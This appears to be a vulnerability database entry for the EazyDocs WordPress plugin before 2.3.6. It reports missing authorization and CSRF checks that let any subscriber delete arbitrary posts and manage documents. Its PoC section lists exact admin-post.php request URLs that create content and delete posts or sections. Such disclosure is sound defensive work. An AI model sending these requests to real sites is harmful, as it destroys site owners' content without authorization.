Lucene search

K

Dao Xuan HieuWPVDB-ID:7A0AAF85-8130-4FD7-8F09-F8EDC929597E

HistoryDec 21, 2023 - 12:00 a.m.

EazyDocs < 2.3.6 - Subscriber+ Arbitrary Posts Deletion and Document Management

2023-12-2100:00:00

Dao Xuan Hieu

wpscan.com

5

eazydocs

plugin

subscriber

arbitrary posts deletion

document management

authorization

csrf checks

documents

sections

authenticated users

poc

vulnerability

security

wordpress

AI Score

6.5

Confidence

High

EPSS

0.001

Percentile

33.0%

Description The plugin does not have authorization and CSRF checks when handling documents and does not ensure that they are documents from the plugin, allowing any authenticated users, such as subscriber to delete arbitrary posts, as well as add and delete documents/sections.

PoC

1. Install the EazyDocs plugin 2. Log in as Subscriber 3. Make GET requests: - To add a document : https://example.com/wp-admin/admin-post.php?Create_doc=yes&parent;_title=doc 1 - To delete a post/document : https://example.com/wp-admin/admin-post.php?Doc_Delete=yes&DeleteID;=12 - To add a section : https://example.com/wp-admin/admin-post.php?Create_Section=yes&parentID;=90&is;_section=sec 1 - To delete a section: https://example.com/wp-admin/admin-post.php?Section_Delete=yes&ID;=110 When making requests, the page will redirect to the login page but the action is still completed, log in as Admin to check the result.

AI Score

6.5

Confidence

High

EPSS

0.001

Percentile

33.0%

Related for WPVDB-ID:7A0AAF85-8130-4FD7-8F09-F8EDC929597E

cve2 nvd2 wpexploit2 prion2 cvelist2 wpvulndb1